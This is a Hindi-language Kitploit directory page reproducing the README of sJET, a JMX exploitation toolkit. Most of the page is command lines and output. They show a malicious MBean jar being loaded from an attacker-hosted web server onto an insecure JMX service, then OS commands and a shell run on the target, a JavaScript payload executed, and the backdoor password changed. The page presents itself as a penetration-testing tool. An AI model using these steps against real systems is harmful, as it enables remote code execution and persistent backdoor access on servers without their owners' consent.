Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
sjet — siberas JMX शोषण टूलकिट | Kitploit
उपकरण/GitHubGitHub/siberas/sjet
पेलोड जनरेशनशोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubsiberas/sjet

sjet

siberas JMX शोषण टूलकिट

रिपॉजिटरी देखें
133915 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

siberas द्वारा sJET

siberas JMX एक्सप्लॉयटेशन टूलकिट

sJET असुरक्षित रूप से कॉन्फ़िगर की गई JMX सेवाओं का आसान शोषण करने की अनुमति देता है। अतिरिक्त पृष्ठभूमि जानकारी यहाँ और यहाँ पाई जा सकती है।

आवश्यक शर्तें

  • Jython 2.7

उपयोग

SJET एक CLI इंटरफ़ेस लागू करता है (argparse का उपयोग करके):

root@kitploit:~
jython sjet.py targetHost targetPort password MODE (modeOptions)

जहाँ

  • targetHost - लक्ष्य IP पता
  • targerPort - वह पोर्ट जहाँ JMX चल रहा है
  • password - वह पासवर्ड जो स्थापना के दौरान सेट किया गया था/है
  • MODE - स्क्रिप्ट मोड
  • modeOptions - चुने गए मोड के विकल्प

मोड और modeOptions

  • install - वर्तमान लक्ष्य में पेलोड स्थापित करता है
    • payload_url - पेलोड लोड करने का पूरा URL
    • payload_port - पेलोड लोड करने का पोर्ट
  • uninstall - वर्तमान लक्ष्य से पेलोड अनइंस्टॉल करता है
  • password - पहले से तैनात पेलोड पर पासवर्ड बदलता है
    • password - नया पासवर्ड
  • command - targetHost में कमांड CMD चलाता है
    • CMD - चलाने के लिए कमांड
  • shell - targetHost में एक सरल शेल शुरू करता है (java के Runtime.exec() की सीमाओं के साथ)
  • javascript - targetHost में एक जावास्क्रिप्ट फ़ाइल FILENAME चलाता है
    • FILENAME - चलाई जाने वाली जावास्क्रिप्ट

उदाहरण

एक असुरक्षित JMX सेवा पर पेलोड MBean स्थापित करना

निम्नलिखित उदाहरण में, असुरक्षित JMX सेवा 192.168.11.136:9991 पर चलती है, हमलावर का IP पता 192.168.11.132 है। JMX सेवा पेलोड jar फ़ाइल डाउनलोड करने के लिए हमलावर की वेब सेवा से कनेक्ट होगी। sJET पोर्ट 8000 पर आवश्यक वेब सेवा शुरू करेगा।

MBean की सफल स्थापना के बाद, डिफ़ॉल्ट पासवर्ड को कमांड लाइन पर प्रदान किए गए पासवर्ड ("super_secret") में बदल दिया जाता है।

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.11.132:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET / HTTP/1.1" 200 -
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET /siberas_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanSiberas:name=payload,id=1
[+] Changing default password...
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

h0ng10@rocksteady:~/sjet$

Linux लक्ष्य में कमांड 'ls -la' चलाना:

पेलोड स्थापित होने के बाद, हम इसका उपयोग लक्ष्य पर OS कमांड निष्पादित करने के लिए कर सकते हैं।

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret command "ls -la"
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  2
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ls -la
total 16
drwxr-xr-x  4 root    root    4096 Aug 22 16:12 .
drwxr-xr-x 66 root    root    4096 Aug 22 16:12 ..
lrwxrwxrwx  1 root    root      12 Mär 29 01:46 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Mär 29 01:46 lib
lrwxrwxrwx  1 root    root      17 Mär 29 01:46 logs -> ../../log/tomcat8
drwxrwxr-x  3 tomcat8 tomcat8 4096 Aug 22 16:12 webapps
lrwxrwxrwx  1 root    root      19 Mär 29 01:46 work -> ../../cache/tomcat8


[+] Done
h0ng10@rocksteady:~/sjet$

लक्ष्य पर शेल मोड में ping चलाना

यदि आप प्रत्येक कमांड के लिए Java लोड नहीं करना चाहते हैं, तो आप एक सीमित कमांड शेल प्राप्त करने के लिए "shell mode" का उपयोग कर सकते हैं।

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret shell
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  3
[+] Use command 'exit_shell' to exit the shell
>>> ping -c 3 127.0.0.1
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.075 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.046 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.044 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2050ms
rtt min/avg/max/mdev = 0.044/0.055/0.075/0.014 ms


>>> exit_shell
[+] Done
h0ng10@rocksteady:~/sjet$

लक्ष्य पर एक JavaScript पेलोड लागू करना:

उदाहरण स्क्रिप्ट "javaproperties.js" असुरक्षित सेवा के Java गुणों को प्रदर्शित करती है। इसे निम्नानुसार लागू किया जा सकता है:

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret javascript scripts/javaproperties.js
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  4
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing script
java.vendor=Oracle Corporation
sun.java.launcher=SUN_STANDARD
catalina.base=/var/lib/tomcat8
sun.management.compiler=HotSpot 64-Bit Tiered Compilers
catalina.useNaming=true
os.name=Linux
...
java.vm.name=OpenJDK 64-Bit Server VM
file.encoding=UTF-8
java.specification.version=1.8


h0ng10@rocksteady:~/sjet$

पासवर्ड बदलें

मौजूदा पासवर्ड ("super_secret") को "this-is-the-new-password" में बदलें:

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret password this-is-the-new-password
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  6
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

[+] Done
h0ng10@rocksteady:~/sjet$

लक्ष्य से पेलोड MBean अनइंस्टॉल करें

लक्ष्य से पेलोड 'Siberas' अनइंस्टॉल करें:

root@kitploit:~
minmaxer@prellermbp:~/sjet$ jython sjet.py 192.168.1.101 9010 super_secret uninstall
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.1.101:9010/jmxrmi
[+] Connected: rmi://192.168.1.1  16
[+] MBean correctly uninstalled
minmaxer@prellermbp:~/sjet$

योगदान

बेझिझक योगदान दें।

लेखक

  • Hans-Martin Münch - प्रारंभिक विचार और कार्य - h0ng10
  • Patricio Reller - CLI और अतिरिक्त विकल्प - preller

इस परियोजना में भाग लेने वाले योगदानकर्ताओं की सूची भी देखें।

लाइसेंस

यह परियोजना MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

टूल डाउनलोड करें